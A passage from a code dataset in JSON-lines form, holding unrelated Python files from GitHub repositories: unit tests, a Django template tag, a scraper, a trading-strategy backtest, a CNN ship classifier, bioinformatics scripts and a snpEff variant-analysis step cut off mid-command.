[[2, 4], ['b', 'y']]])\n result = _normalize_lazy(arr)\n self.assertIs(result, arr, msg='unsupported, returns unchanged')\n\n\nclass TestNormalizeLazyDBAPI2Cursor(unittest.TestCase):\n def setUp(self):\n conn = sqlite3.connect(':memory:')\n conn.executescript('''\n CREATE TABLE mydata(A, B, C);\n INSERT INTO mydata VALUES('x', 'foo', 20);\n INSERT INTO mydata VALUES('x', 'foo', 30);\n INSERT INTO mydata VALUES('y', 'foo', 10);\n INSERT INTO mydata VALUES('y', 'bar', 20);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n ''')\n self.cursor = conn.cursor()\n\n def test_multiple_coumns(self):\n self.cursor.execute('SELECT A, B FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(\n list(result),\n [('x', 'foo'), ('x', 'foo'), ('y', 'foo'),\n ('y', 'bar'), ('z', 'bar'), ('z', 'bar')],\n )\n\n def test_single_column(self):\n \"\"\"Single column selections should be unwrapped.\"\"\"\n self.cursor.execute('SELECT C FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(list(result), [20, 30, 10, 20, 10, 10])\n\n\nclass TestNormalizeEager(unittest.TestCase):\n def test_unchanged(self):\n \"\"\"For given instances, should return original object.\"\"\"\n requirement = [1, 2, 3]\n self.assertIs(_normalize_eager(requirement), requirement)\n\n class MyRequirement(BaseRequirement):\n def __init__(self):\n pass\n\n def __iter__(self):\n return iter([])\n\n def check_data():\n return None\n\n requirement = MyRequirement()\n self.assertIs(_normalize_eager(requirement), requirement)\n\n def test_exhaustible_type(self):\n with self.assertRaises(TypeError, msg='cannot use generic iter'):\n _normalize_eager(iter([1, 2, 3]))\n\n output = _normalize_eager(iter([1, 2, 3]), default_type=set)\n self.assertEqual(output, set([1, 2, 3]))\n\n @unittest.skipUnless(squint, 'requires squint')\n def test_squint_object(self):\n result_obj = squint.Result(iter([1, 2, 3]), evaltype=tuple)\n output = _normalize_eager(result_obj)\n self.assertIsInstance(output, tuple)\n self.assertEqual(output, (1, 2, 3))\n\n def test_iter_items(self):\n items = IterItems(iter([(0, 'x'), (1, 'y'), (2, 'z')]))\n output = _normalize_eager(items)\n self.assertIsInstance(output, dict)\n self.assertEqual(output, {0: 'x', 1: 'y', 2: 
'z'})\n","repo_name":"shawnbrown/datatest","sub_path":"tests/test_normalize.py","file_name":"test_normalize.py","file_ext":"py","file_size_in_byte":11655,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"18"} +{"seq_id":"8833470864","text":"def compute_stop_positions():\r\n import math\r\n from math import sin\r\n\r\n Stop_positions = []\r\n Nsp = 0\r\n Psp=0\r\n cam_fov = 90 # in degrees\r\n rail_lenght = 100 #in meters\r\n max_obj_distance = 15 # in meters\r\n half_fov= cam_fov/2\r\n n = 90 - half_fov\r\n r = sin(math.radians(n))\r\n initial_pos = max_obj_distance * sin(math.radians(half_fov)) / sin(math.radians(n))\r\n\r\n r_initial_pos = round(initial_pos)\r\n Psp = r_initial_pos\r\n # print(r_initial_pos)\r\n Stop_positions.append(r_initial_pos)\r\n\r\n #print(Stop_positions)\r\n Nsp = r_initial_pos + 0.5*r_initial_pos\r\n Stop_positions.append(round(Nsp))\r\n\r\n #print(round(Nsp))\r\n while Nsp < rail_lenght:\r\n Psp = Nsp\r\n Nsp = Psp + round(0.5*Psp)\r\n if Nsp < rail_lenght:\r\n Stop_positions.append(round(Nsp))\r\n Psp += Nsp\r\n # print(Stop_positions)\r\n return Stop_positions\r\n\r\n#implement the movement\r\ncur_location = 0\r\nstop_pos = compute_stop_positions()\r\n\r\n\r\nfor position in stop_pos:\r\n cur_location = position\r\n if cur_location == position:\r\n #move camera to the position\r\n print(\"Camera is at \" + str(cur_location))\r\n # stop camera\r\n #take snap shot\r\n continue\r\n \r\n #","repo_name":"ubong-essien/Attendance-systemin-python","sub_path":"camera_control.py","file_name":"camera_control.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71180879721","text":"from nbc import *\nfrom vanilla import *\nfrom data import *\nfrom matplotlib import pyplot as plt\n\nif __name__ == \"__main__\":\n\n sizes = [1, 5, 10, 20, 25, 30, 40, 50, 60, 70, 80, 90, 99]\n losses = []\n nbc_losses = []\n maxIter = 2\n for size in sizes:\n X = load_data(\"yelp_cat.csv\")\n x1, x2 = split_data(X, size)\n save_split(x1, x2)\n X = load_data(\"train-set.csv\")\n Xt = load_data(\"test-set.csv\")\n\n nbc = NBC(X.as_matrix(), Xt.as_matrix())\n nbc.train()\n nbcloss = nbc.predict_test()\n nbc_losses.append(nbcloss)\n print(\"nbc ZERO-ONE LOSS=\" + str(nbcloss))\n\n y = X['goodForGroups'].as_matrix()\n yt = Xt['goodForGroups'].as_matrix()\n mergeDf = binarize(X, Xt)\n X, Xt = split_vector(mergeDf[0], mergeDf[1])\n nn = train(X, maxIter, y)\n loss = predict_batch(Xt, yt, nn)\n losses.append(loss)\n print(\"pcp ZERO-ONE LOSS=\" + str(loss))\n print(\"\")\n\n plt.plot(sizes, losses)\n plt.plot(sizes, nbc_losses)\n plt.xlabel(\"Training set size %\")\n plt.ylabel(\"Zero one loss\")\n plt.show()\n","repo_name":"exponentialbit1024/PurdueCS","sub_path":"CS373/shah255-hw4/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31205383100","text":"def read_matrix_as_dict(arr):\n ans = {}\n for i in range(len(states)):\n line = [float(x) for x in f.readline().split()[1:]]\n for (ind, x) in enumerate(line):\n ans[(states[i], arr[ind])] = x\n return ans\n\n\ndef skip(n):\n for _ in range(n):\n f.readline()\n\n\ndef reverse_string(str):\n return ''.join(str[::-1])\n\n\nif __name__ == '__main__':\n with open('rosalind_ba10c.txt', 'r') as f:\n input_string = f.readline().rstrip()\n skip(1)\n abc = 
f.readline().split()\n skip(1)\n states = f.readline().split()\n skip(2)\n t_matrix = read_matrix_as_dict(states)\n\n skip(2)\n e_matrix = read_matrix_as_dict(abc)\n\n scores = {(0, state): e_matrix[state, input_string[0]] * 1 / len(states) for state in states}\n next_states = {(0, state): '' for state in states}\n last_char = None\n for (idx, ch) in enumerate(input_string[1:]):\n for state in states:\n max_next_score = None\n for next_state in states:\n temp = (scores[idx, next_state] * t_matrix[next_state, state], next_state)\n if max_next_score is None or max_next_score < temp:\n max_next_score = temp\n scores[idx + 1, state] = max_next_score[0] * e_matrix[state, ch]\n next_states[idx + 1, state] = max_next_score[1]\n if idx == len(input_string) - 2:\n temp = (scores[idx + 1, state], state)\n if last_char is None or temp > last_char:\n last_char = temp\n\n ans = str(last_char[1])\n for i in range(len(input_string) - 1, -1, -1):\n ans += next_states[i, ans[-1]]\n\n print(reverse_string(ans))\n","repo_name":"paskudnicc/Itmo","sub_path":"3 year/bioinf/ba10c.py","file_name":"ba10c.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11071066494","text":"# -*- coding: utf-8 -*-\n# @Author : xiaohao\n# @Email : 321459055@qq.com\n# @File : comment_block.py\n# @Software: PyCharm\n# @Time : 2020/7/31 17:08\n\n\nfrom django import template\n\nfrom apps.comment.form import CommentForm\nfrom apps.comment.models import Comment\n\nregister = template.Library()\n\n\n@register.inclusion_tag('block.html')\ndef comment_block(target):\n \"\"\"Removes all values of arg from the given string\"\"\"\n return {\n 'target': target,\n 'comment_form': CommentForm(),\n 'comment_list': Comment.get_by_target(target)\n }\n","repo_name":"xiaohaogit/blog","sub_path":"myblog/apps/comment/templatetags/comment_block.py","file_name":"comment_block.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71803166440","text":"\nimport sys\nimport os\nimport subprocess\n\nswig = sys.argv[1]\nargs = []\nfor arg in sys.argv[2:]:\n if arg.startswith('--FIX,'):\n inc_dirs = arg[6:].split(',SEP,')\n for inc_dir in inc_dirs:\n args.append('-I' + inc_dir)\n else:\n args.append(arg)\n\ncmdline = [swig] + args\n\nif 'VERBOSE' in os.environ:\n print('Fixed swig command line: ' + ' '.join(cmdline))\n\nsys.exit(subprocess.run(cmdline).returncode)\n","repo_name":"QuTech-Delft/OpenQL","sub_path":"python/compat/fix-swig-cmdline.py","file_name":"fix-swig-cmdline.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"18"} +{"seq_id":"24860961613","text":"import pandas as pd\nimport numpy as np\nfrom mod_backtest_utils.backtest import *\n\nclass BBStrategy(Strategy):\n \"\"\"\n Requires:\n symbol: A stock symbol on which to form a strategy\n bars: A DataFrame of bars for the above symbol\n period: Look back period for BB indicator calculation\n stdmultiplier: the parameter to generate upper and lower band\n \n \"\"\"\n \n def __init__(self, symbol, bars, period, stdmultiplier):\n self.symbol = symbol\n self.bars = bars\n self.period = period\n self.stdmultiplier = stdmultiplier\n \n def generate_signals(self):\n \"\"\"\n Returns the DataFrame of symbols containing the signals to go long, short or hold (1, -1, 0)\n \"\"\"\n # initialize data frame of signals with 
the date from price data frame\n signals = pd.DataFrame(index=self.bars.index)\n signals['price'] = self.bars['price']\n \n # create bb value\n signals['middleband'] = signals['price'].rolling(window=self.period).mean()\n signals['upperband'] = signals['middleband'] + self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n signals['lowerband'] = signals['middleband'] - self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n\n # Create a signal (invested or not invested) \n # buy signal when rsi values crosses buy_threshold from bottom\n # sell signal when rsi values crosses sell_threshold from top\n signals['sell']= 0.0\n signals['buy']= 0.0\n signals['buy'][self.period:] = np.where(signals['price'][self.period:] < signals['lowerband'][self.period:], -1.0, 0.0)\n signals['sell'][self.period:] = np.where(signals['price'][self.period:] > signals['upperband'][self.period:],1.0,0)\n signals['buy'] = signals['buy'].diff()\n signals['sell'] = signals['sell'].diff()\n signals.loc[signals['buy'] == -1.0,['buy']]=0 \n signals.loc[signals['sell'] == 1.0,['sell']]=0 \n signals['buy_sell'] = signals['buy'] + signals['sell']\n return signals[['price', 'buy_sell']]","repo_name":"secmldev/stock-trading","sub_path":"mod_backtest_utils/backtest_bb.py","file_name":"backtest_bb.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10468963872","text":"#!/usr/bin/env python\n # -*- coding: utf-8 -*-\n\nfrom mongoimporter import MongoImporter\nfrom pyquery import PyQuery\nimport urlparse\nimport mechanize\n\n\nclass VerlagScraper:\n\n def __init__(self):\n self.current_url = 'http://daten.ivw.eu/index.php?menuid=13&b=alle'\n\n self.__get_html_data()\n\n def __get_html_data(self):\n verlag_req = mechanize.Request(self.current_url)\n verlag_res = mechanize.urlopen(verlag_req)\n mongo = MongoImporter(coll=\"verlag\")\n\n py_query = PyQuery(verlag_res.read())\n link_list = py_query(\".lz_r a\")\n for link in link_list:\n query = urlparse.urlparse(py_query(link).attr('href')).query\n parsed_query = urlparse.parse_qs(query)\n vid = parsed_query['m'][0]\n title = parsed_query['t'][0].replace(\"Titel des Verlags \", \"\").replace('\"', '')\n decoded = title.replace(\"'\", \"\").replace(\"\\xed\", \"i\").replace(\"\\xd6\", \"Oe\").replace(\"\\xf6g\", \"oe\").replace(\"\\xdc\", \"UE\").replace(\"\\xf6\", \"ue\").replace(\"\\xfc\", \"ue\").replace(\"\\xdf\", \"ss\").replace(\"\\xc4\", \"Ae\").replace(\"\\xfc\", \"ae\").replace(\"\\xe0\", \"a\").replace(\"\\xe4\", \"ae\").replace(\"\\xe9\", \"e\")\n json = ({\"vid\": vid, \"title\": decoded})\n if decoded:\n mongo.insert_json(json)\n","repo_name":"g-div/ivw-viz","sub_path":"scraper/scraper/verlagscraper.py","file_name":"verlagscraper.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27739557508","text":"import sys\r\n\r\nsys.setrecursionlimit(10 ** 6)\r\nMAX = 100000 + 10\r\nN, M, R = map(int, sys.stdin.readline().split())\r\ngraph = [[] for _ in range(MAX)]\r\nvisited = [False for _ in range(MAX)]\r\n\r\nglobal answer\r\nanswer = [0 for _ in range(N)]\r\nglobal order\r\norder = 1\r\n\r\nfor _ in range(M):\r\n x, y = map(int, sys.stdin.readline().split())\r\n graph[x].append(y)\r\n graph[y].append(x)\r\n\r\nfor i in range(1, N + 1):\r\n graph[i].sort()\r\n\r\n\r\ndef dfs(idx):\r\n visited[idx] = True\r\n global order\r\n 
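# nodes are numbered from 1, so node idx is stored at answer[idx-1]\r\n    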
answer[idx-1] = order\r\n order += 1\r\n\r\n data = graph[idx]\r\n for j in range(len(data)):\r\n new_idx = data[j]\r\n if not visited[new_idx]:\r\n dfs(new_idx)\r\n\r\n\r\ndfs(R)\r\n\r\nfor k in answer:\r\n print(k)\r\n","repo_name":"ZhenxiKim/leetCode","sub_path":"백준/Silver/24479. 알고리즘 수업 - 깊이 우선 탐색 1/알고리즘 수업 - 깊이 우선 탐색 1.py","file_name":"알고리즘 수업 - 깊이 우선 탐색 1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14793058095","text":"\nfrom .views import SumLikelihoodByYearView, InsightsByCountryView,AverageIntensityByTopicView, InsightsByTopicSectorView,InsightsScatterPlotView, InsightsByRegionView\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\n\n\n\nurlpatterns = [\n # path(\"\", include(router.urls)),\n path(\"intensity/\", AverageIntensityByTopicView.as_view(), name=\"intensity\" ),\n path(\"countryview/\", InsightsByCountryView.as_view(), name=\"country\" ),\n path(\"likelihood_by_yearview/\", SumLikelihoodByYearView.as_view(), name=\"likelihood\" ),\n path(\"insights_by_region/\", InsightsByRegionView.as_view(), name=\"region\" ),\n path(\"insights_by_topic_sector/\", InsightsByTopicSectorView.as_view(), name=\"topic\" ),\n path(\"insights_by_scatter_plotview/\", InsightsScatterPlotView.as_view(), name=\"scatter\" ),\n]\n\n","repo_name":"Pruthvi2121/Data-Vitulization-Dashboard","sub_path":"backend/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11202666844","text":"\"\"\"\nForget all the nice Object Oreintd Programming for now \nand just throw a few lables and control buttons on to a\ntkinter screen to test out the cheap QUIMAT touch screen\nwith the I2C 32 GPIO priopedia interace also plugged in\n\"\"\"\nimport tkinter as tk \nfrom tkinter import ttk\n# access the i2c 32xGPIO interface\nimport smbus\nbus = smbus.SMBus(0) # 0 for the original RPi, 1 for the newer version\n# using the I2C 32 GPIO priopedia interace set all of J23 to outputs\nbus.write_byte_data(0x20,0x00,0x00)\n# now set up the touch screen control buttons for the first output on J23\nwin = tk.Tk() \nwin.title(\"RPi GUI\") \n# Add a helpful Label\nttk.Label(win, text=\"Test GPIO interface\").grid(column=0, row=0)\n# A dirty bodge to put a bit of space into the window\nttk.Label(win, text=\"\").grid(column=0, row=1)\nttk.Label(win, text=\"\").grid(column=0, row=3)\nttk.Label(win, text=\"\").grid(column=0, row=5)\n\n# Button Click Functions\ndef clickOn():\n bus.write_byte_data(0x20,0x12,0x00)\ndef clickOff():\n bus.write_byte_data(0x20,0x12,0x01)\n\n# Adding a Button\naction1 = ttk.Button(win, text=\"Click on\", command=clickOn)\n# Position Button in second row (zero-based)\naction1.grid(column=0, row=2)\n# Adding a Button\naction2 = ttk.Button(win, text=\"Click off\", command=clickOff)\n# Position Button \naction2.grid(column=0, row=4)\n# Adding a Button\naction3 = ttk.Button(win, text=\"QUIT\", command=quit)\n# Position Button \naction3.grid(column=0, row=6)\n# Start the touch screen interface\nwin.mainloop()\n","repo_name":"doubledodge/Python-RPi-touchscreen","sub_path":"hello2.py","file_name":"hello2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39874997383","text":"import robot_actuator\nimport robot_sensor\nimport 
rospy\n\nclass Robot:\n def __init__(self,robot_name=''):\n self.actuators=[]\n self.sensors=[]\n self.robot_name=robot_name\n\n def act_once(self, actions):\n for i in range(len(self.actuators)):\n self.actuators[i].act_once(actions[i])\n\n def observe_once(self):\n observation = []\n for sensor in self.sensors:\n sensor.wait_new_msg()\n finish = False\n while not finish:\n rospy.rostime.wallsleep(0.01)\n finish = True\n for sensor in self.sensors:\n finish = finish and sensor.check_new_msg()\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def get_last_ob(self):\n observation=[]\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def begin_observation(self):\n for sensor in self.sensors:\n sensor.wait_new_msg()\n\n def check_observation(self):\n for sensor in self.sensors:\n if sensor.check_new_msg() == False:\n return False\n return True\n\n","repo_name":"chesternimiz/multi_robot_gym","sub_path":"multi_robot_gym/src/multi_robot_gym/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11057872209","text":"#!/usr/bin/env python 3\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\npathway = \"C:/Users/soubi/OneDrive/Bureau/Travail/Calf1Calf2/\"\r\nneq_WT = np.loadtxt('{}Calf1Calf2_WT/Neq/CC_WT_traj_all_global.PB.Neq.txt'.format(pathway))\r\nneq_H798P = np.loadtxt('{}Calf1Calf2_H798P/PBxplore/md_CC_H798P_traj_all.PB.Neq.txt'.format(pathway))\r\n\r\nneq1 = neq_WT[:,1]\r\nneq2 = neq_H798P[:,1]\r\ndelta_neq = abs(neq1 - neq2)\r\nx = neq_WT[:,0]\r\n\r\nplt.xlabel(\"Residues\")\r\nplt.ylabel('Delta Neq')\r\nplt.title(\"Delta Neq WT vs H798P\")\r\nplt.plot(x, delta_neq)\r\n#plt.plot(neq1[:,0], neq1[:,1], color = 'r')\r\n#plt.plot(neq2[:,0], neq2[:,1], color = 'g')\r\nplt.show()\r\n\r\n'''\r\ndico_neq_H798P = {}\r\nfor i in neq1[:,0] :\r\n\tcol1 = i\r\n\tcol2 = delta_neq\r\n\tif col1 not in dico_neq_H798P.keys():\r\n\t\tdico_neq_H798P[col1] = col2\r\n\r\nfor key, val in dico_neq_H798P.items():\r\n\tprint(val)\r\n'''\r\n'''\r\ndico = {}\r\nfor i, j in zip(list(range(603,960)),delta_neq) :\r\n\tdico[i] = j\r\nfor k, v in dico.items() :\r\n\tif v >= 2 :\r\n\t\tprint(k, v)\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Soubika/StageM2","sub_path":"DNeq.py","file_name":"DNeq.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71426929960","text":"import pandas as pd\nimport numpy as np\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import SGDClassifier\n\nimport seaborn as sns\n\nfrom tqdm import tqdm\nimport os\n# Initialize global variables\nSAMPLE_SIZE = 10000\nBATCH_SIZE = 32\nTEST_PERC = 0.2\nsegmentations = pd.read_csv(\"../input/train_ship_segmentations.csv\")\nsegmentations['path'] = '../input/train/' + segmentations['ImageId']\nsegmentations.shape\nsegmentations = segmentations.sample(n=SAMPLE_SIZE)\ndef 
has_ship(encoded_pixels):\n hs = [0 if pd.isna(n) else 1 for n in tqdm(encoded_pixels)]\n return hs\nsegmentations['HasShip'] = has_ship(segmentations['EncodedPixels'].values)\nsegmentations['HasShip'].head()\nsegmentations.head()\nsns.countplot(segmentations['HasShip'])\nnp.shape(load_img(segmentations['path'].values[0]))\ntrain,test = train_test_split(segmentations, test_size=TEST_PERC)\nidg_train = ImageDataGenerator(rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\nidg_test = ImageDataGenerator(rescale=1. / 255)\ndef flow_from_dataframe(img_data_gen, in_df, path_col, y_col, **dflow_args):\n base_dir = os.path.dirname(in_df[path_col].values[0])\n print('## Ignore next message from keras, values are replaced anyways')\n df_gen = img_data_gen.flow_from_directory(base_dir, \n class_mode = 'sparse',\n **dflow_args)\n df_gen.filenames = in_df[path_col].values\n df_gen.classes = np.stack(in_df[y_col].values)\n df_gen.samples = in_df.shape[0]\n df_gen.n = in_df.shape[0]\n df_gen._set_index_array()\n df_gen.directory = '' # since we have the full path\n print('Reinserting dataframe: {} images'.format(in_df.shape[0]))\n return df_gen\ntrain_images = flow_from_dataframe(idg_train, train, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntest_images = flow_from_dataframe(idg_train, test, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntrain_images.target_size\nmodel = Sequential()\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(units=128, activation='relu', kernel_initializer='normal'))\nmodel.add(Dense(units=1, activation='sigmoid', kernel_initializer='normal'))\n\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\nfitted_model = model.fit_generator(train_images,\n steps_per_epoch=SAMPLE_SIZE*(1-TEST_PERC)/BATCH_SIZE,\n epochs=20,\n validation_data=test_images,\n validation_steps=SAMPLE_SIZE*(TEST_PERC)/BATCH_SIZE)\nimport matplotlib.pyplot as plt\nimport pylab\n\n\npath = 'results'\nname = 'adam'\n\nplt.plot(fitted_model.history['acc'])\nplt.plot(fitted_model.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\nplt.figure()\nplt.gcf().clear()\nplt.plot(fitted_model.history['loss'])\nplt.plot(fitted_model.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\n\n","repo_name":"aorursy/new-nb-3","sub_path":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_name":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23227278716","text":"def grid_search_cv(x_train,y_train,gbrt,param_grid,cv=10,random_state=43,verbose=0):\n start = datetime.now()\n kinds = np.prod([len(i) for i in param_grid.values()])\n print('开始时间{}, 共计{}种'.format(start,kinds))\n \n grid_search = 
GridSearchCV(estimator=gbrt,param_grid=param_grid,cv=cv,verbose=verbose,return_train_score=True)\n grid_search.fit(x_train,y_train)\n \n end = datetime.now()\n seconds =(end - start).seconds\n print('grid_search_cv, 共计{}种,用时{}秒'.format(kinds,seconds))\n \n return grid_search.cv_results_,grid_search.best_params_\n","repo_name":"richzw/MachineLearningTips","sub_path":"sklearn/Grid_Search.py","file_name":"Grid_Search.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26447760330","text":"import subprocess\nimport os\nimport warnings\n\nimport scanpy as sc\nimport pandas as pd\nimport pysam\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom celescope.tools import utils\nfrom celescope.tools.step import Step\nfrom celescope.tools.step import s_common\nfrom celescope.tools.target_metrics import get_gene_list\nfrom celescope.__init__ import HELP_DICT\nfrom celescope.snp.__init__ import PANEL\n\n\nmatplotlib.use('Agg')\nwarnings.filterwarnings(\"ignore\")\n\nAA_DICT = {\n 'Gly' : 'G',\n 'Ala' : 'A',\n 'Val' : 'V',\n 'Leu' : 'L',\n 'Ile' : 'I',\n 'Phe' : 'F',\n 'Trp' : 'W',\n 'Tyr' : 'Y',\n 'Asp' : 'D',\n 'Asn' : 'N',\n 'Glu' : 'E',\n 'Lys' : 'K',\n 'Gln' : 'Q',\n 'Met' : 'M',\n 'Ser' : 'S',\n 'Thr' : 'T',\n 'Cys' : 'C',\n 'Pro' : 'P',\n 'His' : 'H',\n 'Arg' : 'R',\n}\n\n\ndef parse_variant_ann(variant_ann_file):\n \"\"\"\n Args:\n variant_ann_file: variant annotation file from snpEff.\n \n Returns:\n gene_list, mRNA_list, protein_list\n \"\"\"\n gene_list, mRNA_list, protein_list = [], [], []\n\n with open(variant_ann_file) as f:\n for line in f.readlines():\n if not line.startswith(\"#\"):\n info = line.split('\\t')[7]\n anns = info.split(\"|\")\n gene = anns[3]\n gene_list.append(gene)\n \n tmp1, tmp2 = [], []\n for ann in anns:\n if ann.startswith(\"c.\"):\n exon_loc = anns[anns.index(ann) - 1].split('/')[0]\n # WARNING_TRANSCRIPT_INCOMPLETE\n if not exon_loc:\n continue\n \n exon = ann.strip(\"c.\")\n exon = f\"exon{exon_loc}:{exon}\"\n if exon not in tmp1:\n tmp1.append(exon)\n\n if ann.startswith(\"p.\"):\n protein = ann[2:]\n for i in AA_DICT:\n protein = protein.replace(i, AA_DICT[i])\n if protein not in tmp2:\n tmp2.append(protein)\n \n mRNA_list.append(','.join(tmp1))\n protein_list.append(','.join(tmp2))\n\n return (gene_list, mRNA_list, protein_list)\n\n\ndef parse_vcf_to_df(vcf_file, cols=('chrom', 'pos', 'alleles'), infos=('VID', 'CID')):\n \"\"\"\n Read cols and infos into pandas df\n \"\"\"\n vcf = pysam.VariantFile(vcf_file)\n df = pd.DataFrame(columns=[col.capitalize() for col in cols] + infos)\n rec_dict = {}\n for rec in vcf.fetch():\n\n for col in cols:\n rec_dict[col.capitalize()] = getattr(rec, col)\n if col == 'alleles':\n rec_dict['Alleles'] = '-'.join(rec_dict['Alleles'])\n\n for info in infos:\n rec_dict[info] = rec.info[info]\n\n '''\n rec_dict['GT'] = [s['GT'] for s in rec.samples.values()][0]\n rec_dict['GT'] = [str(item) for item in rec_dict['GT']]\n rec_dict['GT'] = '/'.join(rec_dict['GT'])\n '''\n df_new = pd.DataFrame(rec_dict, index=[0])\n df = pd.concat([df, df_new])\n\n vcf.close()\n df.reset_index(drop=True, inplace=True)\n return df\n\n\ndef vcf_to_gt_csv(vcf_file, csv_file):\n vcf = pysam.VariantFile(vcf_file)\n \n samples = vcf.header.samples\n \n with open(csv_file, 'w') as f:\n header = ['variant'] + list(samples)\n f.write(','.join(header) + '\\n')\n \n for record in vcf:\n mutation_name = f\"{record.chrom}_{record.pos}\"\n genotypes = []\n \n 
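# build one genotype string per sample (cell) in header order\n            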
for sample in samples:\n genotype = record.samples[sample]['GT']\n g1, g2 = genotype\n \n if g1 is None:\n genotype_str = \"NA\"\n else:\n genotype_str = '/'.join([str(g1),str(g2)])\n \n genotypes.append(genotype_str)\n \n line = [mutation_name] + genotypes\n f.write(','.join(line) + '\\n')\n\n\nclass Analysis_snp(Step):\n \"\"\"\n ## Features\n - Annotate variants with [snpEff](http://pcingola.github.io/SnpEff/).\n\n ## Output\n - `{sample}_gt.csv` Genotypes of variants of each cell. Rows are variants and columns are cells.\n - `{sample}_variant_ncell.csv` Number of cells with each genotype.\n - `{sample}_variant_table.csv` annotated with snpEff.\n\n \"\"\"\n\n def __init__(self, args, display_title=None):\n super().__init__(args, display_title)\n self.vcf_file = args.vcf\n\n # parse\n self.gene_list, self.n_gene = get_gene_list(args)\n self.database = args.database\n\n # data\n self.variant_table = None\n\n # out\n self.snpeff_outdir = f'{self.outdir}/snpEff/'\n self.snpeff_ann_vcf_file = f'{self.snpeff_outdir}/variants_ann.vcf'\n self.final_vcf_file = f'{self.out_prefix}_final.vcf'\n utils.check_mkdir(self.snpeff_outdir)\n self.plot_snp_dir = f'{self.outdir}/{self.sample}_plot_snp/'\n\n self.gt_file = f'{self.out_prefix}_gt.csv'\n self.ncell_file = f'{self.out_prefix}_variant_ncell.csv'\n self.variant_table_file = f'{self.out_prefix}_variant_table.csv'\n\n @utils.add_log\n def write_gt(self):\n vcf_to_gt_csv(self.final_vcf_file, self.gt_file)\n\n @utils.add_log\n def write_ncell(self):\n \"\"\"\n parse gt_file to collect each genotype cell count into ncell_file\n \"\"\"\n df = pd.read_csv(self.gt_file, index_col=0)\n df_ncell = df.apply(pd.Series.value_counts, axis=1).fillna(0).astype(int)\n df_ncell.to_csv(self.ncell_file, index=True)\n\n @utils.add_log\n def run_snpEff(self):\n cmd = (\n f\"snpEff 